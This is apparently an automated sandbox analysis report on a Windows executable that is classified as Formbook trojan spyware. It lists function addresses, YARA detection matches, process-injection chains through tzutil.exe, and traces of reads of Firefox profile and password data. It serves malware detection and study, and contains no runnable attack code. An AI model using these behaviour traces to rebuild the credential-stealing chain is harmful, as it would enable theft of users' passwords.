Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010E95C3	3_2_010E95C3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DF43F	3_2_010DF43F
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01011460	3_2_01011460
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DF7B0	3_2_010DF7B0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01065630	3_2_01065630
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D16CC	3_2_010D16CC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010B5910	3_2_010B5910
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01029950	3_2_01029950
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103B950	3_2_0103B950
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0108D800	3_2_0108D800
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010238E0	3_2_010238E0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DFB76	3_2_010DFB76
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103FB80	3_2_0103FB80
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01095BF0	3_2_01095BF0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0105DBF9	3_2_0105DBF9
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DFA49	3_2_010DFA49
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D7A46	3_2_010D7A46
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01093A6C	3_2_01093A6C
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01065AA0	3_2_01065AA0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010BDAAC	3_2_010BDAAC
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010C1AA3	3_2_010C1AA3
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010CDAC6	3_2_010CDAC6
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01023D40	3_2_01023D40
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D1D5A	3_2_010D1D5A
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010D7D73	3_2_010D7D73
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_0103FDC0	3_2_0103FDC0
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01099C32	3_2_01099C32
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DFCF2	3_2_010DFCF2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DFF09	3_2_010DFF09
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01021F92	3_2_01021F92
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_010DFFB1	3_2_010DFFB1
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00FE3FD5	3_2_00FE3FD5
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_00FE3FD2	3_2_00FE3FD2
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: 3_2_01029EB0	3_2_01029EB0
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_03206A7C	5_2_03206A7C
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_03204AF7	5_2_03204AF7
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_03204AFC	5_2_03204AFC
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320D1B7	5_2_0320D1B7
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320D1BC	5_2_0320D1BC
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_03206853	5_2_03206853
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0320685C	5_2_0320685C
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Code function: 5_2_0322555C	5_2_0322555C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B3E3F0	6_2_03B3E3F0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BF03E6	6_2_03BF03E6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEA352	6_2_03BEA352
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BB02C0	6_2_03BB02C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BD0274	6_2_03BD0274
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BF01AA	6_2_03BF01AA
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE41A2	6_2_03BE41A2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE81CC	6_2_03BE81CC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BCA118	6_2_03BCA118
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B20100	6_2_03B20100
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BB8158	6_2_03BB8158
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BC2000	6_2_03BC2000
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B2C7C0	6_2_03B2C7C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B30770	6_2_03B30770
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B54750	6_2_03B54750
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B4C6E0	6_2_03B4C6E0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BF0591	6_2_03BF0591
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B30535	6_2_03B30535
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BDE4F6	6_2_03BDE4F6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BD4420	6_2_03BD4420
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE2446	6_2_03BE2446
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE6BD7	6_2_03BE6BD7
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEAB40	6_2_03BEAB40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B2EA80	6_2_03B2EA80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B329A0	6_2_03B329A0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BFA9A6	6_2_03BFA9A6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B46962	6_2_03B46962
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B168B8	6_2_03B168B8
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B5E8F0	6_2_03B5E8F0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B3A840	6_2_03B3A840
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B32840	6_2_03B32840
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BAEFA0	6_2_03BAEFA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B3CFE0	6_2_03B3CFE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B22FC8	6_2_03B22FC8
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B50F30	6_2_03B50F30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BD2F30	6_2_03BD2F30
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B72F28	6_2_03B72F28
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BA4F40	6_2_03BA4F40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B42E90	6_2_03B42E90
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BECE93	6_2_03BECE93
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEEEDB	6_2_03BEEEDB
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEEE26	6_2_03BEEE26
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B30E59	6_2_03B30E59
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B48DBF	6_2_03B48DBF
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B2ADE0	6_2_03B2ADE0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BCCD1F	6_2_03BCCD1F
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B3AD00	6_2_03B3AD00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BD0CB5	6_2_03BD0CB5
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B20CF2	6_2_03B20CF2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B30C00	6_2_03B30C00
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B7739A	6_2_03B7739A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE132D	6_2_03BE132D
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B1D34C	6_2_03B1D34C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B352A0	6_2_03B352A0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BD12ED	6_2_03BD12ED
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B4B2C0	6_2_03B4B2C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B3B1B0	6_2_03B3B1B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B1F172	6_2_03B1F172
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BFB16B	6_2_03BFB16B
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B6516C	6_2_03B6516C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE70E9	6_2_03BE70E9
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEF0E0	6_2_03BEF0E0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BDF0CC	6_2_03BDF0CC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B370C0	6_2_03B370C0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEF7B0	6_2_03BEF7B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE16CC	6_2_03BE16CC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B75630	6_2_03B75630
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BCD5B0	6_2_03BCD5B0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BF95C3	6_2_03BF95C3
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE7571	6_2_03BE7571
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEF43F	6_2_03BEF43F
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B21460	6_2_03B21460
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B4FB80	6_2_03B4FB80
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BA5BF0	6_2_03BA5BF0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B6DBF9	6_2_03B6DBF9
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEFB76	6_2_03BEFB76
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BCDAAC	6_2_03BCDAAC
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B75AA0	6_2_03B75AA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BD1AA3	6_2_03BD1AA3
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BDDAC6	6_2_03BDDAC6
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BA3A6C	6_2_03BA3A6C
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEFA49	6_2_03BEFA49
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE7A46	6_2_03BE7A46
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BC5910	6_2_03BC5910
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B39950	6_2_03B39950
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B4B950	6_2_03B4B950
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B338E0	6_2_03B338E0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B9D800	6_2_03B9D800
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEFFB1	6_2_03BEFFB1
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B31F92	6_2_03B31F92
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEFF09	6_2_03BEFF09
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B39EB0	6_2_03B39EB0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B4FDC0	6_2_03B4FDC0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE7D73	6_2_03BE7D73
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BE1D5A	6_2_03BE1D5A
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03B33D40	6_2_03B33D40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BEFCF2	6_2_03BEFCF2
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_03BA9C32	6_2_03BA9C32
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032D1D60	6_2_032D1D60
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032CAF3B	6_2_032CAF3B
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032CAF40	6_2_032CAF40
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032CCEC0	6_2_032CCEC0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032CCCA0	6_2_032CCCA0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032CCC97	6_2_032CCC97
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032D3600	6_2_032D3600
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032D35FB	6_2_032D35FB
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032D5420	6_2_032D5420
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_032EB9A0	6_2_032EB9A0
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_0399E3C4	6_2_0399E3C4
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_0399E4E3	6_2_0399E4E3
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_0399CB73	6_2_0399CB73
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_0399D8E8	6_2_0399D8E8
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: 6_2_0399E87C	6_2_0399E87C

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: String function: 01067E54 appears 110 times
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: String function: 0108EA12 appears 86 times
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: String function: 0100B970 appears 265 times
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: String function: 01055130 appears 58 times
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Code function: String function: 0109F290 appears 105 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03BAF290 appears 105 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03B65130 appears 58 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03B1B970 appears 280 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03B77E54 appears 111 times
Source: C:\Windows\SysWOW64\tzutil.exe	Code function: String function: 03B9EA12 appears 86 times

Source: 3qsTcL9MOT.exe, 00000000.00000002.2058664897.000000000148E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs 3qsTcL9MOT.exe
Source: 3qsTcL9MOT.exe, 00000000.00000002.2070996600.0000000008260000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs 3qsTcL9MOT.exe
Source: 3qsTcL9MOT.exe, 00000000.00000000.2046817176.0000000000E02000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSlqn.exe> vs 3qsTcL9MOT.exe
Source: 3qsTcL9MOT.exe, 00000003.00000002.2291660238.0000000000B77000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametzutil.exej% vs 3qsTcL9MOT.exe
Source: 3qsTcL9MOT.exe, 00000003.00000002.2291982390.000000000110D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs 3qsTcL9MOT.exe
Source: 3qsTcL9MOT.exe, 00000003.00000002.2291660238.0000000000B97000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenametzutil.exej% vs 3qsTcL9MOT.exe
Source: 3qsTcL9MOT.exe	Binary or memory string: OriginalFilenameSlqn.exe> vs 3qsTcL9MOT.exe

Source: 3qsTcL9MOT.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 3.2.3qsTcL9MOT.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.3qsTcL9MOT.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2291851698.0000000000E70000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.4512495754.0000000004E90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4510684852.0000000003850000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2291195440.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.4510685027.0000000002F40000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4509758463.00000000032C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.4510740156.00000000038A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.2297013663.0000000001430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: 3qsTcL9MOT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	Security API names: _0020.SetAccessControl
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	Security API names: _0020.AddAccessRule
Source: 0.2.3qsTcL9MOT.exe.8260000.6.raw.unpack, yaC5dx9LwQox17wUZp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, yaC5dx9LwQox17wUZp.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	Security API names: _0020.SetAccessControl
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.3qsTcL9MOT.exe.4647300.4.raw.unpack, VBdy1hHPW9s0VO0NFx.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@19/13

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\3qsTcL9MOT.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\tzutil.exe

File created: C:\Users\user\AppData\Local\Temp\q3a81SS

Jump to behavior

Source: 3qsTcL9MOT.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 3qsTcL9MOT.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: tzutil.exe, 00000006.00000003.2476277245.0000000003443000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2479212117.000000000344E000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.4509911861.0000000003443000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000002.4509911861.0000000003472000.00000004.00000020.00020000.00000000.sdmp, tzutil.exe, 00000006.00000003.2476176944.0000000003422000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: 3qsTcL9MOT.exe

ReversingLabs: Detection: 71%

Source: unknown	Process created: C:\Users\user\Desktop\3qsTcL9MOT.exe "C:\Users\user\Desktop\3qsTcL9MOT.exe"
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process created: C:\Users\user\Desktop\3qsTcL9MOT.exe "C:\Users\user\Desktop\3qsTcL9MOT.exe"
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Process created: C:\Users\user\Desktop\3qsTcL9MOT.exe "C:\Users\user\Desktop\3qsTcL9MOT.exe"	Jump to behavior
Source: C:\Program Files (x86)\zZQYKwZoIJescBlCRlSUyxyfHoyfMqXeCjHfNIoYERhtvimxAX\GxqFOvQfqyr.exe	Process created: C:\Windows\SysWOW64\tzutil.exe "C:\Windows\SysWOW64\tzutil.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\tzutil.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\3qsTcL9MOT.exe	Section loaded: mscoree.dll	Jump to behavior
